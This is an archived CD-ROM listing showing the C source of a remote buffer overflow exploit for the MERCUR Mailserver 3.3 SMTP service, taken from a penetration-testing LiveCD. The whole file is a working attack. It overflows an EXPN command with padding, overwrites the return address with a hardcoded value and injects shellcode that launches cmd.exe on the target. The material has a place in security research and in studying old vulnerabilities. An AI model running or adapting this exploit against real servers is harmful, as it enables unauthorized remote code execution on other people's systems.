Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / mercur / mercur33exploit.c < prev

Wrap

C/C++ Source or Header | 2005-02-12 | 1KB | 79 lines

/* MERCUR Mailserver 3.3 Remote Buffer Overflow Tested on Win2K AS SP1 with MERCUR SMTP- Server v3.30.03 Martin Rakhmanoff martin@direct.spb.ru */ #include <winsock2.h> #include <stdio.h> /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */ char shellcode[] = "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77 \xFF\xD0\x33\xDB\x53" "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64 \x2E\x65\x78\x65\x0D\x0A"; /* In SoftICE bpx 001b:00418b65 - here eip is restored with overwritten value... */ int main(int argc, char * argv[]){ int i; char sploit[512]; char buffer[512]; WSADATA wsaData; SOCKET sock; struct sockaddr_in server; struct hostent *hp; WSAStartup(0x202,&wsaData); hp = gethostbyname("arena"); memset(&server,0,sizeof(server)); memcpy(&(server.sin_addr),hp->h_addr,hp- >h_length); server.sin_family = hp->h_addrtype; server.sin_port = htons(25); sock = socket(AF_INET,SOCK_STREAM,0); connect(sock,(struct sockaddr*)&server,sizeof (server)); sploit[0]='E'; sploit[1]='X'; sploit[2]='P'; sploit[3]='N'; sploit[4]=0x20; for(i=5;i<137;i++){ sploit[i]=0x41; } // Return address //77E87D8B sploit[137]=0x8B; sploit[138]=0x89; sploit[139]=0xE8; sploit[140]=0x77; for(i=0;i<sizeof(shellcode);i++){ sploit[i+141]=shellcode[i]; } recv(sock,buffer,512,0); send(sock,sploit,173,0); closesocket(sock); WSACleanup(); return 0; }